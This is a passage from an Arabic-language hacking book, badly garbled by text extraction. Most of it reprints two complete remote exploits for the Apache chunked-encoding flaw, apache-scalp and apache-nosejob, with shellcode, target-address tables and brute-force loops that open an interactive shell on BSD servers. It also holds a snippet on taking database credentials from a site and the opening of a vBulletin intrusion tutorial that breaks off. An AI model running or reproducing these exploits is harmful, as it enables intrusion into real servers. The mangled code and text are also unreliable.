كما هو موجود بالشرح النقليزي يعني فكر واستنتج :-) ولن بعض المواقع تمنع التحميل الى الموقع النhttp://server.com/ultramode.txtما عليك سوى الدخول الى

وستجد باس واليوزر التابع لقاعدة بيانات الموقع=-

ملحظات بالموقع الراد اختراقهserver.com- بدل 1

http://server.com/nuke- تأكد من موقع المجلة مثال : 2

كما يظن البعض.5.2- هذه الثغرة ل تعمل مع اصدار 3

انتهى،،،

282

Page 283: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"Chunkedثغرة "

>angels-bytes<ةةةةة ةة ةةةة

عنها هوangels-bytes ، السبب لعدم تحدث موقع Apache لـ Chunkedكلنا سمع بثغره تسمى ، وهي أداةRetina Apache Chunked Scannerأنها أتت قبل إنطلق الموقع ، الن سأضع

عنوان آي بي ، وتظهر لك ما منها مصاب بهذه الثغره.254تقوم بفحص نطاق من

فهو الفضل الى الن 2.0.39إذا أردت معالجة هذه الثغره عند وجودها فأنصحك بتنزيل أباتشي هذه هي وصلة التنزيل

http://www.apache.org/dist/httpd/binaries

أما لمسألة إستثمار هذه الثغره فسوف أضع لكم أفضل أستثمارين

، وهي في الروتين البرمجي الذيdev-2.0.36 إلى 2 و من 2 واعلى إلى 1.3.24الخطأ في أباتشي يتعامل مع رسائل الخطأ

هذان الستثماران تستخدمان من قبل مهاجم بعيد لتسبب طفح محلي في السيرفر المصاب ، مؤديه بذلك إلىإعادة كتابه في الذاكرة ، وبطريقة ما تسمح لتنفيذ كود

قبل وضعها لكم هنا ))angels-bytes.com/*(( قد تم تجريبها وإختبارها من قبل /*

/*حصلنا عليها من سيكورتي تيم*/#include #include #include #include #include #include #include #include #include

283

Page 284: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

#include #include

#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed/*

#define RET_ADDR_INC 512

#define MEMCPY_s1_OWADDR_DELTA -146#define PADSIZE_1 4#define PADSIZE_2 5#define PADSIZE_3 7

#define REP_POPULATOR 24#define REP_RET_ADDR 6#define REP_ZERO 36#define REP_SHELLCODE 24#define NOPCOUNT 1024

#define NOP 0x41#define PADDING_1 \\'A'\\#define PADDING_2 \\'B'\\#define PADDING_3 \\'C'\\

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s;(#define PUT_BYTES(n, b) memset(p, b, n); p += n;

#define SHELLCODE_LOCALPORT_OFF 30

char shellcode= []\\\\ "\\\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\

\\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8\\\\x1f"\\\

\\\\ "\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a\\\\x02"\\\

\\\\ "\\\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\\\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24\\\\x04"\\\

\\\\ "\\\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb8"\\\

\\\\ "\\\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08\\\\x03"\\\

\\\\ "\\\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b\\\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01\\\\x89"\\\

284

Page 285: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

\\\\ "\\\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\\\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80"\\\

\\\\ "\\\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0\\\\x50"\\\

\\\\ "\\\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xcc;"\\\

struct} char *type;

u_long retaddr; {targets[] = { // hehe, yes theo, that say OpenBSD here!

"\\\ }OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f,{ "\\\ }OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa,{ "\\\ }OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae,{

;{

int main(int argc, char *argv} ([]

char *hostp, *portp;unsigned char buf[512], *expbuf, *p;

int i, j, lport;int sock;

int bruteforce, owned, progress;u_long retaddr;

struct sockaddr_in sin, from;

if(argc != 3} (printf(\\\"Usage: %s \\\\n\\\", argv[0;([

printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n;("\\\printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000

127.0.0.1:8080\\\\n;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n;("\\\

printf(\\\"Target ID / Target specification\\\\n;("\\\for(i = 0; i < sizeof(targets)/8; i(++

printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type;(

return -1;{

285

Page 286: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

hostp = strtok(argv[2;("\\\:"\\\ ,[if((portp = strtok(NULL, \\\":\\\")) == NULL(

portp = \\\"80;"\\\

retaddr = strtoul(argv[1], NULL, 16;(if(retaddr < sizeof(targets)/8} (

retaddr = targets[retaddr].retaddr;bruteforce = 0;

{else

bruteforce = 1;

srand(getpid;(()signal(SIGPIPE, SIG_IGN;(

for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC} (

*/skip invalid return adresses/* i = retaddr & 0xff;

if(i == 0x0a || i == 0x0d(retaddr;++

else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4((continue;

sock = socket(AF_INET, SOCK_STREAM, 0;(sin.sin_family = AF_INET;

sin.sin_addr.s_addr = inet_addr(hostp;(sin.sin_port = htons(atoi(portp;((

if(!progress(printf(\\\"\\\\n[*] Connecting;("\\\ ..

fflush(stdout;(if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0} (

perror(\\\"connect;("\\\()exit(1;(

{

if(!progress(printf(\\\"connected!\\\\n;("\\\

*/Setup the local port in our shellcode/* i = sizeof(from;(

if(getsockname(sock, (struct sockaddr *) & from, &i) != 0} (perror(\\\"getsockname;("\\\()

exit(1;({

lport = ntohs(from.sin_port;(

286

Page 287: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;

p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE(

)) +PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR;((

PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n;("\\\

for (i = 0; i < REP_SHELLCODE; i} (++PUT_STRING(\\\"X;("\\\-

PUT_BYTES(PADSIZE_3, PADDING_3;(PUT_STRING;("\\\ :"\\\)

PUT_BYTES(NOPCOUNT, NOP;(memcpy(p, shellcode, sizeof(shellcode) - 1;(

p += sizeof(shellcode) - 1;PUT_STRING(\\\"\\\\r\\\\n;("\\\

{

for (i = 0; i < REP_POPULATOR; i} (++PUT_STRING(\\\"X;("\\\-

PUT_BYTES(PADSIZE_1, PADDING_1;(PUT_STRING;("\\\ :"\\\)

for (j = 0; j < REP_RET_ADDR; j} (++*p++ = retaddr & 0xff;*p++ = (retaddr >> 8) & 0xff;*p++ = (retaddr >> 16) & 0xff;*p++ = (retaddr >> 24) & 0xff;{

PUT_BYTES(REP_ZERO, 0;(PUT_STRING(\\\"\\\\r\\\\n;("\\\

{

PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n;("\\\snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2;(

PUT_STRING(buf;(PUT_BYTES(PADSIZE_2, PADDING_2;(

snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", MEMCPY_s1_OWADDR_DELTA;(

PUT_STRING(buf;(

write(sock, expbuf, p - expbuf;(

progress;++if((progress%70) == 0(

progress = 1;

287

Page 288: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

if(progress == 1} (memset(buf, 0, sizeof(buf;((

sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport %u,"\\\

retaddr, (unsigned int)(p - expbuf), lport;(memset(buf + strlen(buf), \\' \\', 74 - strlen(buf;((

puts(buf;(if(bruteforce(

putchar;('\\;'\\){

elseputchar((rand()%2)? \\'P\\': \\'p;('\\

fflush(stdout;(while (1} (

fd_set fds;int n;

struct timeval tv;

tv.tv_sec = EXPLOIT_TIMEOUT;tv.tv_usec = 0;

FD_ZERO(&fds;(FD_SET(0, &fds;(

FD_SET(sock, &fds;(

memset(buf, 0, sizeof(buf;((if(select(sock + 1, &fds, NULL, NULL, &tv) > 0} (

if(FD_ISSET(sock, &fds} ((if((n = read(sock, buf, sizeof(buf) - 1)) <= 0(

break;

if(!owned && n >= 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0} (printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n;("\\\

printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr;(sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD local

kernel exploit to gain instant r00t\\\\n;("\\\write(sock, expbuf, strlen(expbuf;((

owned;++{

write(1, buf, n;({

if(FD_ISSET(0, &fds} ((if((n = read(0, buf, sizeof(buf) - 1)) < 0(

exit(1;(

write(sock, buf, n;(

288

Page 289: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

{{

if(!owned(break;

{

free(expbuf;(close(sock;(

if(owned(return 0;

if(!bruteforce} (fprintf(stderr, \\\"Ooops.. hehehe!\\\\n;("\\\

return -1;{{

return 0;{

Exploit #2:#include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__#include #endif

#define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field/* #define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use another

bug/backdoor/feature (hi Theo!) to gain instant r00t\\';\\\\n"\\\#define RET_ADDR_INC 512

#define PADSIZE_1 4#define PADSIZE_2 5#define PADSIZE_3 7

289

Page 290: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

#define REP_POPULATOR 24#define REP_SHELLCODE 24#define NOPCOUNT 1024

#define NOP 0x41#define PADDING_1 \\'A'\\#define PADDING_2 \\'B'\\#define PADDING_3 \\'C'\\

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s;(#define PUT_BYTES(n, b) memset(p, b, n); p += n;

char shellcode= []\\\\ "\\\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\

\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6\\\\x04\\\\x24"\\\

\\\\ "\\\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1\\\\xea\\\\x31"\\\

\\\\ "\\\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\\\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80\\\\x7c\\\\x24"\\\

\\\\ "\\\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04\\\\x20\\\\x89"\\\

\\\\ "\\\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\\\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24\\\\x14\\\\x89"\\\

\\\\ "\\\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d\\\\xcd\\\\x80"\\\

\\\\ "\\\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff\\\\x04\\\\x24"\\\

\\\\ "\\\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51\\\\x50\\\\xb0"\\\

\\\\ "\\\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\\\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\\x41\\\\x80"\\\

\\\\ "\\\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0\\\\xb0\\\\x5a"\\\

\\\\ "\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\\\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\\xc0\\\\x50"\\\

\\\\ "\\\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68\\\\x2a\\\\x47"\\\

\\\\ "\\\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\

290

Page 291: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

\\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04\\\\xcd\\\\x80"\\\

\\\\ "\\\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89\\\\xe3\\\\x50"\\\

\\\\ "\\\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc;"\\\;

struct} char *type; /* description for newbie penetrator/*

int delta; /* delta thingie/* !u_long retaddr; /* return address/*

int repretaddr; /* we repeat retaddr thiz many times in the buffer/* int repzero; /* and \\\\0\\'z this many times/*

{targets[] = { // hehe, yes theo, that say OpenBSD here!"\\\ }FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36,{ "\\\ }FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36,{ "\\\ }OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36,{ "\\\ }OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36,{ "\\\ }OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36,{ "\\\ }OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36,{ "\\\ }OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,

36,{ "\\\ }NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42,{ "\\\ }NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42,{ "\\\ }NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42,{ "\\\ }NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42,{ "\\\ }NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42,{

,{victim;

void usage(void} (int i;

printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache-nosejob.c\\\\n\\\\n;("\\\

printf(\\\"Usage: ./apache-nosejob <-switches> -h host[:80]\\\\n;("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n;("\\\

printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n;("\\\printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n;("\\\

printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n;("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n;("\\\

printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,

291

Page 292: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

0x080e0000/nbsd.\\\\n;("\\\printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to

overwrite\\\\n;("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n;("\\\

printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the buffer\\\\n;("\\\

printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n;("\\\printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the

buffer\\\\n;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n;("\\\

printf(\\\" Optional stuff:\\\\n;("\\\printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for

shellcode reply\\\\n;("\\\printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode

replies\\\\n;("\\\printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n;("\\\

printf(\\\"\\\\nExamples will be published in upcoming apache-scalp-HOWTO.pdf\\\\n;("\\\

printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n;("\\\printf(\\\" ID / Return addr / Target specification\\\\n;("\\\

for(i = 0; i < sizeof(targets)/sizeof(victim); i(++printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type;(

exit(1;({

int main(int argc, char *argv} ([]char *hostp, *portp, *cmdz = DEFAULT_CMDZ;

u_char buf[512], *expbuf, *p;int i, j, lport, sock;

int bruteforce, owned, progress, sc_timeout = 5;int responses, shown_length = 0;

struct in_addr ia;struct sockaddr_in sin, from;

struct hostent *he;

if(argc < 4(usage;()

bruteforce = 0;memset(&victim, 0, sizeof(victim;((

while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1} (switch(i} (

*/required stuff/* case \\'h:'\\

hostp = strtok(optarg;("\\\:"\\\ ,if((portp = strtok(NULL, \\\":\\\")) == NULL(

portp = \\\"80;"\\\

292

Page 293: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

break;

*/predefined targets/* case \\'t:'\\

if(atoi(optarg) >= sizeof(targets)/sizeof(victim} ((printf(\\\"Invalid target\\\\n;("\\\

return -1;{

memcpy(&victim, &targets[atoi(optarg)], sizeof(victim;((break;

*/bruteforce/* !case \\'b:'\\

bruteforce;++victim.type = \\\"Custom target;"\\\

victim.retaddr = strtoul(optarg, NULL, 16;(printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",

victim.retaddr;(break;

case \\'d:'\\victim.delta = atoi(optarg;(

printf(\\\"Using %d as delta\\\\n\\\", victim.delta;(break;

case \\'r:'\\victim.repretaddr = atoi(optarg;(

printf(\\\"Repeating the return address %d times\\\\n\\\", victim.repretaddr;(

break;

case \\'z:'\\victim.repzero = atoi(optarg;(

printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero;(break;

case \\'o:'\\bruteforce;++

switch(*optarg} (case \\'f:'\\

victim.type = \\\"FreeBSD;"\\\victim.retaddr = 0x80a0000;

victim.delta = -150;victim.repretaddr = 6;

victim.repzero = 36;break;

case \\'o:'\\victim.type = \\\"OpenBSD;"\\\

293

Page 294: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

victim.retaddr = 0x80000;victim.delta = -146;

victim.repretaddr = 6;victim.repzero = 36;

break;

case \\'n:'\\victim.type = \\\"NetBSD;"\\\

victim.retaddr = 0x080e0000;victim.delta = -90;

victim.repretaddr = 5;victim.repzero = 42;

break;

default:printf(\\\"[-] Better luck next time!\\\\n;("\\\

break;{

break;

*/optional stuff/* case \\'w:'\\

sc_timeout = atoi(optarg;(printf(\\\"Waiting maximum %d seconds for replies from

shellcode\\\\n\\\", sc_timeout;(break;

case \\'c:'\\cmdz = optarg;

break;

default:usage;()break;

{{

if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero} (printf(\\\"[-] Incomplete target. At least 1 argument is missing (nmap

style!!)\\\\n;("\\\return -1;

{

printf(\\\"[*] Resolving target host;("\\\ ..fflush(stdout;(

he = gethostbyname(hostp;(if(he(

memcpy(&ia.s_addr, he->h_addr, 4;(else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY} (

printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp;(

294

Page 295: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

return -1;{

printf(\\\"%s\\\\n\\\", inet_ntoa(ia;((

srand(getpid;(()signal(SIGPIPE, SIG_IGN;(

for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC} ( */skip invalid return adresses/*

if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4((continue;

sock = socket(PF_INET, SOCK_STREAM, 0;(sin.sin_family = PF_INET;

sin.sin_addr.s_addr = ia.s_addr;sin.sin_port = htons(atoi(portp;((

if(!progress(printf(\\\"[*] Connecting;("\\\ ..

fflush(stdout;(if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0} (

perror(\\\"connect;("\\\()exit(1;(

{

if(!progress(printf(\\\"connected!\\\\n;("\\\

p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE(

)) +PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero +1024 * (REP_POPULATOR;((

PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\" HOST_PARAM \\\"\\\\r\\\\n;("\\\

for (i = 0; i < REP_SHELLCODE; i} (++PUT_STRING(\\\"X;("\\\-

PUT_BYTES(PADSIZE_3, PADDING_3;(PUT_STRING;("\\\ :"\\\)

PUT_BYTES(NOPCOUNT, NOP;(memcpy(p, shellcode, sizeof(shellcode) - 1;(

p += sizeof(shellcode) - 1;PUT_STRING(\\\"\\\\r\\\\n;("\\\

{

for (i = 0; i < REP_POPULATOR; i} (++

295

Page 296: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

PUT_STRING(\\\"X;("\\\-PUT_BYTES(PADSIZE_1, PADDING_1;(

PUT_STRING;("\\\ :"\\\)for (j = 0; j < victim.repretaddr; j} (++

*p++ = victim.retaddr & 0xff;*p++ = (victim.retaddr >> 8) & 0xff;*p++ = (victim.retaddr >> 16) & 0xff;*p++ = (victim.retaddr >> 24) & 0xff;{

PUT_BYTES(victim.repzero, 0;(PUT_STRING(\\\"\\\\r\\\\n;("\\\

{

PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n;("\\\snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2;(

PUT_STRING(buf;(PUT_BYTES(PADSIZE_2, PADDING_2;(

snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta;(PUT_STRING(buf;(

if(!shown_length} (printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p - expbuf;((

shown_length = 1;{

write(sock, expbuf, p - expbuf;(

progress;++if((progress%70) == 0(

progress = 1;

if(progress == 1} (printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr;(

for(i = 0; i < 40; i(++ printf;("\\\ "\\\)

printf(\\\"\\\\n;("\\\if(bruteforce(

putchar;('\\;'\\){

elseputchar(((rand()>>8)%2)? \\'P\\': \\'p;('\\

fflush(stdout;(responses = 0;

while (1} (fd_set fds;

int n;struct timeval tv;

296

Page 297: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

tv.tv_sec = sc_timeout;tv.tv_usec = 0;

FD_ZERO(&fds;(FD_SET(0, &fds;(

FD_SET(sock, &fds;(

memset(buf, 0, sizeof(buf;((if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0} (

if(FD_ISSET(sock, &fds} ((if((n = read(sock, buf, sizeof(buf) - 1)) < 0(

break;

if(n >= 1(}

if(!owned(}

for(i = 0; i < n; i(++ if(buf[i] == \\'G('\\

responses;++ else

responses = 0;if(responses >= 2(

}owned = 1;

write(sock, \\\"O\\\", 1;(write(sock, cmdz, strlen(cmdz;((

printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,

victim.retaddr, victim.repretaddr, victim.repzero;(printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen

now;("\\\ :fflush(stdout;(

{ {else

write(1, buf, n;({{

if(FD_ISSET(0, &fds} ((if((n = read(0, buf, sizeof(buf) - 1)) < 0(

exit(1;(

write(sock, buf, n;({

{

if(!owned(

297

Page 298: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

break;{

free(expbuf;(close(sock;(

if(owned(return 0;

if(!bruteforce} (fprintf(stderr, \\\"Ooops.. hehehe!\\\\n;("\\\

return -1;{{

return 0;{

قبل وضعها لكم هنا ))angels-bytes.com(( قد تم تجريبها وإختبارها من قبل

وهذي وصلة تنزيل البرنامجhttp://www.angels-bytes.com/?show=tools&action=info&id=19

انتهى،،،

298

Page 299: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

حماية المنتديات ""

<ةةةةة>

و التي يصمم بها المنتديات و الكل يعرف أيضا أنها مليئة بالثغرات الكبيرة phpالكل يعرف لغة

) بعض الساسيات التي يتم بها حماية منتداك / vbإليك مدير أي منتدى (

-ل و قبل كل شيء المدير العام ضع مديرين إثنين واحد تكتب فيه المشاركات و تعديل المنتدى و كل شيء1و الخر للحتياط عندما يسرق المدير العام .

بواسطة المفكرة وadmin الموجود بـمجلد index.php-مي لوحة التحكم بكلمة سر أي إفتح ملف 2أضف عليه كود كلمة السر الذي هو /

?>php

$LOGIN = "User ;"$PASSWORD = "Password ;"

function error ($error_message } (echo $error_message ".

;"exit ;

{

if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN) && ( $PHP_AUTH_PW == "$PASSWORD } ( (( "

header("WWW-Authenticate: Basic entrer="Form2txt admin ;(""header("HTTP/1.0 401 Unauthorized ;("

error("<p align=right><font face=Tahoma size=2 color=Redليس من حقك< >"); font></pالدخول إلى هذه الصفحة</

{ <?

مع تغيير كلمتي User

و Password

299

Page 300: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

عضو ووضع الزائر الكريم قائمة العضاء و قعد3000-غ قائمة العضاء لماذا ؟؟ مثل لو كان لديك 3 يفحط به أصبح هناك ضغط كبير على المنتدى قد تسألوني لماذا ل نلغي قائمة البحث !! لن البحث في النسخ

الجديدة يكون بأكثر من ثلث أحرف و بهذا لن يكون هناك أي ضغط .

في المنتديات أي إفتحها بمنتدى واحد أو إثنين فقط لوجود الضرورة .. لماذا ؟؟HTML- تكثر فتح لغة 4لنه يوجد كود هتمل يفسد جميع المواضيع التي تعتمد على هذه اللغة .

-توقيع و ما أدراك ما التوقيع . إجعله فقط يخدم الصور أما الفلش و الصوت فل .5

انتهى،،،

"vBulletin2,2,0اختراق المنتديات من نوع "

<ةةةةة>

--------- مقدمة :

---------

vBulletinالموضوع : اختراق الـ (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .WebServerالمتطلبات :

المستوى : متوسط

فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .vBulletinملحظة : هذه الطريقة لست للـ

---------- الثغرة :

---------

